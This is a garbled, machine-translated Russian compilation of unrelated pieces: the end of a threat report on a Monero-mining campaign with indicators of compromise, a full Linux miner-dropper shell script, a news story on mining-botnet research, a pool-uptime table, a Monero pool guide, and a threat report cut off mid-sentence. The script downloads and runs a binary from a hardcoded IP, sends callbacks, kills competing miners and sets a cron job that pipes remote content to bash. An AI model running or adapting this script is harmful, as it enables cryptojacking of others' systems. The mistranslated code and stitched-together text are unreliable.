Однако, несмотря на то, что атрибуция всегда трудна и часто далеко от уверенности, в этой кампании все еще есть свободные нити: на момент написания daterup1.ddns [.] Net преобразовывается в IP 88.120.123.246. Этот IP-адрес снова появляется как буквально, так и как разрешенный адрес для домена blioman [.] Ovh в файле listserveurs , полученном 20 февраля 2017 года.

WHOIS данные для домена blioman.ovh записывает адрес электронной почты регистранта alexandre.thomassin@gmail [.] com , создавая возможную связь со строками alex и alex-hp , указанными как в файле .lnk, так и в списке работников, возвращенном самим C2 . Это имя снова появляется в регистрационных данных для alurea [.] Net (дочерний домен alurea [.] Fr , который разрешается на тот же IP-адрес) как alexandre.thomassin@mi-informatique [.] Fr .

Хотя ассоциация в лучшем случае слабая — особенно с учетом законного характера других сайтов, на которых размещены панели C2 — краткий поиск показывает, что пользователь с именем blioman был активен в ряде криптовалютных сообществ, включая localbitcoins.com [3] , dash.org [4] и moneroclub.com [5] .

Заключение

майнеров Monero уже наблюдались в дикой природе, и валюта достаточно новая, так что по-прежнему существует относительно высокая доходность от «майнинга».

Помимо благоприятной прибыли от майнинга по сравнению с другими криптовалютами, существует ряд других факторов, которые делают его привлекательным:

  • Он был принят в середине 2016 года AlphaBay и Oasis — двумя известными торговыми площадками в глубокой сети;
  • Он предлагает улучшенную конфиденциальность по сравнению с биткойнами: его непрозрачный блокчейн серьезно ограничивает отслеживаемость валюты, тем самым устраняя необходимость отмывания денег перед обменом на обычные валюты;
  • Алгоритм, используемый в процессе майнинга, спроектирован с ограничением памяти и, таким образом, потенциально более подходит для майнинга в сети обычных домашних компьютеров, чем алгоритм Биткойн с ограничением ЦП, который лучше подходит для специализированных майнинговых машин на базе графических процессоров.

Хотя этот случай кажется небольшой, упрощенной кампанией, он свидетельствует о низком барьере для проникновения в киберпреступность. Доступность инструментов с открытым исходным кодом в сочетании с хорошо документированными методами и процедурами может привести к тому, что все больше и больше людей будут испытывать искушение «попробовать».

Заявление о защите

Пользователи

Forcepoint ™ защищены от этой угрозы с помощью TRITON® ACE на следующих этапах атаки:

Этап 5 (файл-дроппер) — Запрещается загрузка и / или выполнение вредоносных компонентов.

Этап 6 (Звонок домой) — Трафик C2 на основе HTTP заблокирован.

Индикаторы компрометации

Образцы (SHA1)

05a02703a19d798415aa98212cf0f7242ba9b4da
0bfdf18d27d8166c9eec82707574fff1bd37a5d2
49c02edf98dc537d7603b7bade39b58464e14fb0
e106e55fd377daa15151a113ad68c18cec7447c0
8ad17ff1cf0e356f8df6f04b19fa680064dc1b5a
d020ff5b82ff6809c132c176da80e6eab20b5458 

Домены C2

hxxp: // altia-residences [.] com / misc
hxxp: // alurea [.] fr / разное
hxxp: // feuerstein [.] fr / misc
hxxp: // goepper [.] fr / misc
hxxp: // tiptop [.] fr / misc
hxxp: // bmge [.] net / разное
hxxp: // vivaldi-france [.] fr / misc
hxxp: // blioman [.] ovh: 8085 / разное
hxxp: //88.120.123 [.] 246: 8085 / разное
hxxp: //daterup1.ddns [.] net / misc 

Сноски

[1] https://blog.malwarebytes.com/cybercrime/2017/01/the-curious-case-of-a-sundown-ek-variant-dropping-a-cryptocurrency-miner/

[2] https://github.com/tsiv/ccminer-cryptonight

[3] https: // localbitcoins.ru / accounts / profile / Blioman /

[4] https://www.dash.org/forum/members/blioman.3938/

[5] https://www.moneroclub.com/user/1067024038

Сценарий внедрения майнера Linux Monero · GitHub

экспорт ПУТЬ = $ ПУТЬ: / bin: / usr / bin: / usr / local / bin: / usr / sbin
HOST = 191.101.180.74
ОБРАТНЫЙ ЗВОНОК = $ HOST
# DOWNLOADER = «curl»
ЗАГРУЗИТЕЛЬ = «wget ​​-q -O -»
LFILE_NAME = «hp_systemd»
# LFILE_PATH = `pwd` / $ LFILE_NAME
LFILE_PATH = / tmp / $ LFILE_NAME
DEFAULT_RFILE = $ HOST / files / hpl64
OTHERS_RFILE = $ HOST / files / hpl32
ЧИСТЫЙ ()
{
RMLIST = (/ tmp / * index_bak * / tmp / * httpd.conf * /tmp/*httpd.conf / tmp / a7b104c270 / tmp / Carbon)
KILIST = (crobon SB1 wipefs AnXqV.yam [email protected] monerohash.com / TMP / a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr: 443)
для элемента в $ {RMLIST [@]}
до
RM -RF $ товар
выполнено
для элемента в $ {KILIST [@]}
до
ps auxf | grep -v grep | grep $ item | awk ‘{print $ 2}’ | xargs kill -9
выполнено
день = $ (($ (date +% s) / 60/60/24))
пс auxf | grep -v grep | grep «42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1 | print6qV
ps auxf | grep -v grep | grep $ {days} | awk ‘{print $ 2}’ | xargs kill -9
пс auxf | grep -v grep | grep «logind.conf «| awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «cryptonight» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «kworker» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «Silence» | awk ‘{print $ 2}’ | xargs kill -9
пс auxf | grep -v grep | grep «45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9 | kill 904 | kill
пс auxf | grep -v grep | grep «47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1gs4 awk-9 {x» print $ 2?
пс auxf | grep -v grep | grep «44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2gszwk-M ‘|
пс auxf | grep -v grep | grep «xmr.crypto-pool.fr «| awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «t.sh» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «wipefs» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «carbon» | awk ‘{print $ 2}’ | xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f крипто-пул
pkill -f xmr
pkill -f прохаш
pkill -f monero
pkill -f майнер
pkill -f nanopool
pkill -f minergate
pkill -f ям
pkill -f Тишина
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f локон
ps auxf | grep -v grep | grep «mine.moneropool.com» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «крипто-пул» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «prohash» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «monero» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «miner» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «nanopool» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «minergate» | awk ‘{print $ 2}’ | xargs kill -9
пс auxf | grep -v grep | grep «xmr.crypto-pool.fr:8080″|awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «xmr.crypto-pool.fr:3333″|awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «xmr.crypto-pool.fr:443″|awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «[email protected]» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «stratum» | awk ‘{print $ 2}’ | xargs kill -9
ps auxf | grep -v grep | grep «44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWz printUdrAD $ 90 |
пс auxf | grep -v grep | grep «42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1 | print6qV
ps auxf | grep -v grep | grep «49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7 |
пс auxf | grep -v grep | grep «479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jdk |
ps auxf | grep -v grep | grep «11231» | awk ‘{print $ 2}’ | xargs kill -9
pkill -f biosetjenkins
ps ax | grep var | grep lib | grep jenkins | grep -v httpPort | grep -v headless | grep «\ -c» | xargs kill -9
пс топор | grep -o ‘./ [0-9] * -c ‘| xargs pkill -f
pkill -f петля
pkill -f apaceha
pkill -f cryptonight
ps ax | grep tmp | grep irqa | grep -v grep | awk ‘{print $ 1}’ | xargs ps —ppid | awk ‘{print $ 1}’ | grep -v PID | xargs kill -9
ps ax | grep tmp | grep irqa | grep -v grep | awk ‘{print $ 1}’ | xargs kill -9
pkill -f 45.76.102.45
pkill -f страта
pkill -f mixnerdx
pkill -f выполнено
pkill -f сон
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f крипто-пул
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f соед.sh
pkill -f kworker34
pkill -f квт.ш
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
пс -ef | grep ‘.так ‘| grep -v grep | cut -c 9-15 | xargs kill -9;
pkill -f 45.76.146.166
pkill -f irqbalanc1
pkill -f 188.120.247.175
rm -rf /tmp/httpd.conf
rm -rf / tmp / conn
rm -rf / tmp / conns
rm -f / tmp / irq.sh
rm -f / tmp / irqbalanc1
rm -f / tmp / irq
}
ПО УМОЛЧАНИЮ ()
{
$ DOWNLOADER $ DEFAULT_RFILE> $ LFILE_PATH
chmod + x $ LFILE_PATH
ps -ef | grep $ LFILE_NAME | grep -v grep
если [$? -ne 0]; затем
$ LFILE_PATH -B && $ DOWNLOADER «$ {CALLBACK} /? Info = l60»
еще
$ DOWNLOADER «$ {CALLBACK} /? Info = l69»
fi
}
ДРУГИЕ ()
{
$ ЗАГРУЗЧИК $ OTHERS_RFILE> $ LFILE_PATH
chmod + x $ LFILE_PATH
ps -ef | grep $ LFILE_NAME | grep -v grep
если [$? -ne 0]; затем
$ LFILE_PATH -B && $ DOWNLOADER «$ {CALLBACK} /? Info = l30»
еще
$ DOWNLOADER «$ {CALLBACK} /? Info = l39»
fi
}
CRON () {
, если [-x / usr / bin / wget]; затем
echo ‘* / 8 * * * * wget -q -O — $ HOST / robots.txt | bash ‘> /tmp/.$LFILE_NAME.cron
elif [-x / usr / bin / curl]; затем
echo ‘* / 8 * * * * curl $ HOST / robots.txt | bash’> /tmp/.$LFILE_NAME.cron
еще
выход 0;
fi
crontab -r
crontab / tmp /.$ LFILE_NAME.cron
rm /tmp/.$LFILE_NAME.cron
}
INIT () {
эхо 128> / proc / sys / vm / nr_hugepages
sysctl -w vm.nr_hugepages = 128
}
УБИТЬ () {
ps aux | grep -v $ LFILE_NAME | awk ‘{if ($ 3> 20.0) print $ 2} ‘| пока читал procid
до
убить -9 $ procid
выполнено
}
INIT
ПО УМОЛЧАНИЮ || ДРУГИЕ
ЧИСТЫЙ
# KILL
# CRON
crontab -r

Более 4 процентов всей Monero было добыто вредоносными ботнетами

Примерно 4.Согласно исследованию, опубликованному ранее в этом месяце учеными из Испании и Великобритании, 32 процента всей криптовалюты Monero, находящейся в обращении, было добыто ботнетами и киберпреступными операциями.

Исследование было одним из крупнейших в своем роде за последние годы. Ученые проанализировали около 4,4 миллиона образцов вредоносных программ и выявили один миллион штаммов вредоносных программ, добывающих криптовалюту на зараженных хостах.

Штаммы вредоносных программ, которые они проанализировали, охватывали период в колоссальные двенадцать лет, с 2007 по 2018 год.

Исследовательская группа заявляет, что изучила IOC (индикаторы компрометации) и использовала методы статического и динамического анализа для извлечения информации из штаммов вредоносных программ, таких как адреса криптовалюты и пулы майнинга, которые штаммы вредоносных программ использовали в прошлом для сбора и пересылки денег.

Исследователи использовали собранные данные для отслеживания прошлых платежей из пулов майнинга группам, стоящим за каждым кошельком. Кроме того, они также организовали штаммы вредоносных программ в кампании на основе сходства и общих адресов криптовалюты.

Согласно результатам исследования, в то время как некоторые группы добывали различные криптовалюты в конце 2000-х — начале 2010-х годов, Monero (XMR) в настоящее время, безусловно, является самой популярной криптовалютой среди киберпреступников в теневой экономике.

Без учета доходов групп, которые добывали Monero с использованием мошеннического кода JavaScript, загруженного в браузеры пользователей (метод, называемый криптоджекингом), исследователи говорят, что вредоносные бот-сети для крипто-майнинга отвечают за добычу 4,32 процента всех монет Monero.

«Хотя это зависит от того, когда преступники обналичивают свои доходы, по нашим оценкам, общий доход составляет около [57 миллионов долларов]», — отмечают исследователи в своей статье.

Некоторые преступные группировки были более эффективными, чем другие. Исследователи говорят, что группы, арендовавшие вредоносное ПО и стороннюю серверную инфраструктуру на подпольных торговых площадках, обычно были более успешными, чем подавляющее большинство групп, создававших свои собственные инструменты.

Однако в целом, независимо от того, арендовали ли они вредоносное ПО или создали его самостоятельно, наиболее успешными группами были те, кто использовал бот-сети для масштабного развертывания своего вредоносного ПО.

В отчете упоминаются ранее известные кампании по майнингу Monero, такие как Adylkuzz и Smominru, но исследователи также заявили, что они обнаружили новые группы, крупнейшую из которых они назвали Freebuf, а другую — USA-138.

Изображение: Pastrana et al.

Одна группа, в частности, сделала Monero на сумму более 18 миллионов долларов, что составляет примерно 1,45 процента всех монет Monero.

Некоторые из этих групп существовали в течение коротких периодов времени, но другие постоянно обновляли свою инфраструктуру и вредоносное ПО, оставаясь активными по сей день. Исследователи говорят, что мошенники обычно изменяли свой код, когда их адреса XMR были заблокированы для определенных майнинговых пулов или когда им нужно было обновить вредоносное ПО, чтобы применить изменения протокола майнинга.

Когда исследователи посмотрели на то, какие преступные группы майнингового пула предпочитают заниматься майнингом и выводом средств на свои частные адреса, безусловно, выбором номер один был крипто-пул.fr, ответственный за обналичивание 47 миллионов долларов из 57 миллионов долларов, которые удалось отследить исследователям.

Изображение: Pastrana et al.

В то время как исследователи наблюдали, как некоторые преступные группы в последние годы прилагали усилия для добычи других криптовалют, сейчас Monero является предпочтительной криптовалютой почти для всех операций по майнингу криптовалют.

Причину нетрудно догадаться, поскольку майнинг криптовалют на основе биткойнов теперь имеет более высокую сложность майнинга и также требует специального оборудования, что делает развертывание вредоносных программ для майнинга этих типов валют на обычных ПК бесполезным и невыгодным.

Последний вывод этой исследовательской работы, но не менее интересный, заключается в том, что большинство сегодняшних криминальных операций по добыче полезных ископаемых полагаются на инструмент с открытым исходным кодом под названием xmrig, на основе которого большинство мошенников построили свои вредоносные программы для крипто-майнинга.

В то время как исследователи видели больше образцов вредоносных программ, созданных на основе программного обеспечения для майнинга Claymore, в большинстве отслеживаемых ими активных вредоносных кампаний использовались штаммы вредоносных программ на основе xmrig.

Эту статистику можно объяснить несколько экспериментальным характером штамма вредоносных программ для крипто-майнинга на основе биткойнов в конце 2000-х, когда авторы вредоносных программ играли с вредоносными программами для майнинга биткойнов, но никогда не применяли их в типах крупномасштабных кампаний, которые мы видели в Monero. майнеры, развернутые за последние два года.

Изображение: Pastrana et al.

Для получения более подробной информации о вредоносном ПО для майнинга криптовалюты, пожалуйста, обратитесь к исследовательской статье под названием «Первый взгляд на экосистему вредоносного ПО для криптовалютного майнинга: десятилетие неограниченного богатства», написанной исследователями из Мадридского университета Карлоса III и Королевского колледжа. Лондон.

Больше защиты:

Время работы пулов Monero

Время работы пулов Monero
Название пула Хешрейт Последний час API / Stratum Последний день API / Stratum На прошлой неделе API / Stratum Последний месяц API / Stratum
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце

9134
Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
9402 9449
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
9442
Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Сервис Последний час Последний день На прошлой неделе В прошлом месяце
Вопросы? Проверьте FAQ (прокрутите вниз)

Отзыв? Новый пул для отслеживания? Свяжитесь со мной по [защищенному адресу электронной почты] электронной почте

пулов для майнинга Monero: лучшие места для майнинга XMR в 2020 году

По мере того, как все больше и больше монет становятся жертвами майнинговых установок ASIC и специализированных майнинговых ферм, обычному человеку кажется невозможным больше участвовать в майнинге.Это верно для многих монет, но есть одна монета, которую до сих пор добывают частные лица, и она обещала оставаться такой, даже чтобы остановить усилия производителей ASIC.

Я говорю о Monero, монете, ориентированной на конфиденциальность, которая идеально подходит для тех, кто хочет майнить криптовалюту с помощью домашнего компьютера. Monero по-прежнему можно выгодно майнить с помощью вашего графического процессора благодаря приверженности сообщества Monero отсутствию ASIC.

Если вы еще не знакомы с майнингом Monero и лучшими домашними настройками, вы можете перейти к моему руководству по майнингу Monero, чтобы узнать больше о реальном процессе майнинга.

Чтобы улучшить вашу работу по майнингу, вам следует подумать о присоединении к майнинговому пулу Monero. Мы расскажем все, что вам нужно знать о поиске подходящего пула и лучших пулов XMR, к которому можно присоединиться сегодня.

Зачем нужен пул Monero?

Пулы для майнинга

объединяют в себе хэш-мощность всех своих участников для более эффективного майнинга. Когда вы присоединитесь к майнинговому пулу, вы будете получать меньшие выплаты, но они также будут более регулярными. Здесь меньше удачи, и заработки стабильные и регулярные.Каждый блок, добытый пулом, делится между всеми участниками пула в зависимости от того, какой метод выплаты используется пулом (подробнее об этом позже).

Самостоятельный майнинг, называемый соло-майнингом, по-прежнему возможен с Monero, и если вы найдете блок, вы получите значительное количество монет. Проблема в том, что с домашней установкой вам действительно нужно быть удачливым, чтобы когда-либо найти блок. Так что, даже если вы нашли блок, вряд ли вы будете делать это очень часто. Это означает, что вам несколько лучше с пулом для майнинга, поскольку он устраняет большую часть дисперсии, связанной с майнингом криптовалют.

Прежде чем вы действительно сможете присоединиться к майнинговому пулу, вы должны убедиться, что знаете, что вы ищете от указанного пула.

Что искать в пуле для майнинга Monero

Функции пула для майнинга криптовалюты одинаковы, независимо от того, какую криптовалюту вы планируете майнить. Главной особенностью будет надежный пул, который, как известно, выплачивает все доходы майнерам в пуле.

Это не редкость для недобросовестных операторов, но более устоявшиеся пулы обычно считаются заслуживающими доверия.Вы будете удивлены, как быстро сообразительные майнеры обнаружат операторов пула, которые пытаются скинуть часть выплат или мощность хеширования.


Изображение с Fotolia

Следующая особенность, которую вам нужно изучить, — это комиссии, взимаемые пулом. Чем выше комиссии, тем ниже выплаты и при прочих равных условиях вы хотите найти пул для майнинга с самыми низкими комиссиями, чтобы вы могли максимизировать свои доходы. Как правило, вы обнаружите, что у большинства пулов очень похожие комиссии, но есть некоторые, которые выше или ниже, и стоит потратить время, чтобы узнать, сколько вы откажетесь от комиссии.

Третий фактор, который следует учитывать, — это расположение серверов пула. Вам нужно найти пул с серверами, которые расположены рядом с вами, по крайней мере, на том же континенте. Итак, если вы находитесь в Лос-Анджелесе, лучше всего найти пул с серверами в Лос-Анджелесе или, по крайней мере, в США. Пул, в котором есть серверы только в Азии, не будет для вас наиболее эффективным. Это связано с тем, что чем ближе к вашему местоположению находятся серверы пула, тем выше будет ваша хэш-мощность.

Еще один фактор, на который обращают внимание некоторые, — это минимальная выплата пула.Более низкая минимальная выплата всегда лучше, но если вас не слишком беспокоит частота вывода средств, вы можете найти более высокую минимальную выплату, которая будет приемлемой. На это также повлияет мощность вашего оборудования. Если вы сможете получить минимальную выплату за день или два с вашей установкой, вы будете меньше беспокоиться, чем если бы для достижения минимальной выплаты потребовалось бы 10+ дней.

Многие майнеры пулов не учитывают следующий фактор, но он действительно важен для поддержания децентрализации сети. Это общая мощность хэширования пула.К сожалению, слишком много майнеров просто ищут самый большой пул, а затем присоединяются к нему, не думая, что они увеличивают хэш-мощность пула, который уже чрезвычайно влиятелен в сети. Гораздо лучше выбрать пул меньшего размера, и с Monero вы обнаружите, что большое количество майнеров майнят в одиночку просто потому, что это помогает поддерживать как можно более децентрализованную сеть.

Наконец, проверьте работоспособность пула. У большинства пулов действительно очень высокое время безотказной работы, но на это стоит потратить немного времени.Чем выше время безотказной работы, тем лучше, потому что, если пул не работает, это не майнинг.

Хард-форк Monero


Хард-форк Monero

Прежде чем я перейду к лучшим пулам для майнинга Monero, я хочу уделить минуту, чтобы рассказать о недавнем хард-форке Monero для тех, кто может не знать о нем.

По сути, произошло то, что ведущий производитель ASIC Bitmain объявил, что они разработали ASIC-майнер, способный работать по алгоритму Cryptonight, который является алгоритмом, используемым Monero.Сообщество Monero настолько категорически против централизации, вызванной майнингом ASIC, что они решили провести хард-форк Monero, чтобы отключить возможность использования майнеров ASIC на монете. Хард-форк произошел 6 апреля 2018 года.

Этот хард-форк стал серьезным сигналом для разработчиков ASIC-майнеров, и мы не ожидали увидеть еще один ASIC-майнер для Monero. Форк также сделал монету более ориентированной на конфиденциальность, что повысило ее привлекательность для сообщества майнеров, занимающихся вопросами конфиденциальности.

Хорошая новость для индивидуальных майнеров заключается в том, что форк позволил майнить Monero достаточно легко, чтобы отдельные люди могли добывать монету, не беспокоясь о том, что установки ASIC будут доминировать в хэш-мощности и оттеснить отдельных лиц.Monero остается чрезвычайно популярным, что также должно привести к росту цен. Фактически, он настолько популярен, что его использование в темной сети превзошло биткойн.

Сложность майнинга значительно упала сразу после форка, и теперь майнить Monero по-прежнему намного проще, чем до форка. Сейчас прекрасное время, чтобы начать. Давайте взглянем на некоторые из лучших пулов для майнинга Monero.

Лучшие пулы Monero

Теперь, когда у вас есть приблизительное представление о том, что вам нужно искать в пуле для майнинга, мы можем обобщить список некоторых из самых уважаемых пулов, присутствующих в настоящее время на рынке.Конечно, это не исчерпывающий список, и, как и во всем, что связано с криптовалютой, вам следует провести собственное исследование.

Минергейт

Minergate был очень популярным выбором для майнинговых пулов Monero из-за простоты использования. Он имеет время безотказной работы 99,7%, что неплохо, а комиссия за его майнинг-пул составляет всего 1%, что является стандартным для майнинговых пулов. Minergate также имеет очень низкую минимальную выплату 0,01 XMR, поэтому большинство людей смогут получать ежедневные выплаты.


Статистика пула MinerGate

Наконец, вы можете заниматься веб-майнингом с помощью Minergate, что очень удобно и способствовало популярности пула.Minergate вносит примерно 16 MH / s в мировой хешрейт, что составляет примерно 460 MH / s.

Нанопул

Nanopool — еще один популярный выбор для пулов для майнинга Monero. У него стандартная комиссия за майнинг 1%, но при рассмотрении времени безотказной работы могут возникнуть некоторые опасения. За прошедшую неделю время безотказной работы составило 99,99%, а за последний месяц — всего 92,74%. Вероятно, это единичный случай, но его стоит отметить.


Панель приборов XMRNanopool

Минимальный платеж — 0.3 XMR, а у Nanopool есть несколько раундов выплат в день. Одна из причин, по которой следует избегать использования Nanopool, заключается в том, что в настоящее время у него самый высокий хешрейт среди всех пулов — 103 MH / s.

MineXMR

MineXMR принесет вам такую ​​же комиссию в размере 1%, как и указанные выше пулы для майнинга, но когда дело доходит до минимальной выплаты, MineXMR составляет 0,004 XMR, что означает, что почти каждый должен получать ежедневные выплаты. Время безотказной работы — выдающиеся 100%.


Характеристики MineXMR

Одной из проблем, аналогичных Nanopool, является большой хешрейт MineXMR, который в настоящее время превышает 95 MH / s.Это менее 25%, но стоит следить, если вы решите майнить здесь. Здесь вы можете увидеть хешрейт и время работы пула.

Крипто-пул Monero FR

Monero Crypto Pool FR был популярным вариантом для майнеров из Европы, но в последнее время их время безотказной работы было не таким хорошим. За последний месяц они показали время безотказной работы всего 81,79%, что просто недопустимо.

Кроме того, у них довольно высокая комиссия за майнинг в 2%. Минимальный вывод составляет 0,3 XMR, что также немного выше по сравнению с конкурирующими сайтами.Что касается хешрейта, то они составляют 1,59 MH / s.

МонероХэш

MoneroHash — один из старейших пулов для Monero, запущенный в октябре 2014 года. У них немного высокая комиссия за майнинг в 1,6%, но они также позволяют майнить напрямую на биржевой кошелек, что позволяет избежать комиссий за транзакции.


Функции MoneroHASH

Существует довольно высокая минимальная выплата в размере 0,5 XMR, так что учтите и это, особенно если у вас нет особо мощной установки для майнинга.Хешрейт в MoneroHash составляет 4,32 MH / s, а время безотказной работы за последний месяц составило 99,92%.

Поддержка XMR

Все предыдущие пулы добывают монеты, кроме Monero, но Support XMR добывает только Monero. У них низкая комиссия всего 0,6% и минимальный платеж 0,1 XMR, что делает их одними из лучших с финансовой точки зрения. Они также позволяют отслеживать производительность ваших буровых установок по диаграмме скорости хеширования на одного рабочего.


Поддержка статистики пула XMR

SupportXMR платит своим майнерам каждые два часа, и они позволяют вам устанавливать собственные пороги оплаты для обычных и обменных кошельков.Они популярны, о чем свидетельствует их хешрейт 82,89 MH / s. С точки зрения времени безотказной работы они также являются одними из лучших, со 100% -ным временем безотказной работы за последние 30 дней.

XMRPool.net

Это еще один пул для майнинга только для Monero, но XMRPool.net намного меньше, чем Support XMR. Как и у Support XMR, у них низкая комиссия в размере 0,6%, но минимальный платеж здесь составляет 0,3 XMR. Вы можете увидеть, насколько мал пул для майнинга, если посмотрите на хешрейт, который составляет всего 607,27 KH / s. Время безотказной работы отличное, хотя и составляет 100%.

Unipool.pro

Unipool — оператор пула, который только что запустил свой новый веб-сайт. У них также есть пул Monero, к которому также можно получить доступ здесь.


Пул Unipool Monero Пул Monero

Unipool меньше, чем все остальные пулы, указанные выше. Однако это может быть полезно, когда речь идет о вознаграждениях за блок и децентрализации. Общая комиссия пула для майнинга XMR составляет 0,5%.

Заключение

Майнинг

Monero остается одним из лучших вариантов для энтузиастов домашнего майнинга благодаря стремлению сообщества Monero оставаться устойчивым к ASIC.

Когда вы объединяете свою мощность хэширования Monero с другими пользователями, вы можете сгладить изменчивость доходов, поскольку пулы для майнинга будут находить блоки гораздо чаще, чем отдельные майнеры.

Существует много хороших пулов для майнинга Monero, и ваш выбор, какой из них использовать, должен основываться на расположении серверов, взимаемой комиссии, надежности пула, времени безотказной работы пула и хэш-скорости пула. .

Удачного хеширования!

Изображение из Fotolia

Добыча монет

с помощью оппортунистических и автоматизированных угроз

Учитывая недавний всплеск популярности и рост ценности криптовалюты, неудивительно, что финансово мотивированные злоумышленники начали использовать своих жертв для внесения вклада в усилия по «майнингу», когда вычислительные ресурсы жертвы используются для генерации криптовалюты для злоумышленник.Чтобы преуспеть в получении большой прибыли, участники должны постоянно компрометировать большое количество жертв и использовать значительные вычислительные ресурсы. Это требование массового компромисса вынудило этих злоумышленников применять автоматизированные методы, которые полагаются на оппортунистическую эксплуатацию, чтобы опередить защитников, увеличивая количество жертв как можно быстрее с минимальными затратами.

Хотя на первый взгляд, влияние добычи монет на бизнес кажется минимальным, наличие неавторизованной стороны, контролирующей ваши системы, представляет собой опасную подстановочную карту.Это действительно преступник, занимающийся добычей монет, или это маскировка? Что они будут делать с доступом, если добыча монет перестанет приносить прибыль? Команда Gigamon Applied Threat Research (ATR) стала свидетелем инцидентов, исходящих от преступников, решивших продать свой доступ другим сторонам, а все более распространенная схема «вредоносное ПО как услуга» увеличивает риск «простой» добычи монет. Проще говоря, криминальная постэксплуатация стала эффективным и широко распространенным бизнесом, который представляет угрозу для всех предприятий, особенно тех, которые имеют значительный и исторический след в Интернете, который может содержать недокументированные или устаревшие системы и страницы.В этом посте мы расскажем о кампании атаки, свидетелями которой команда Gigamon ATR наблюдала в течение последних нескольких недель, и разберем некоторые ключевые уроки, извлеченные из этой атаки.

Прохождение атаки

Эксплуатация

Злоумышленники

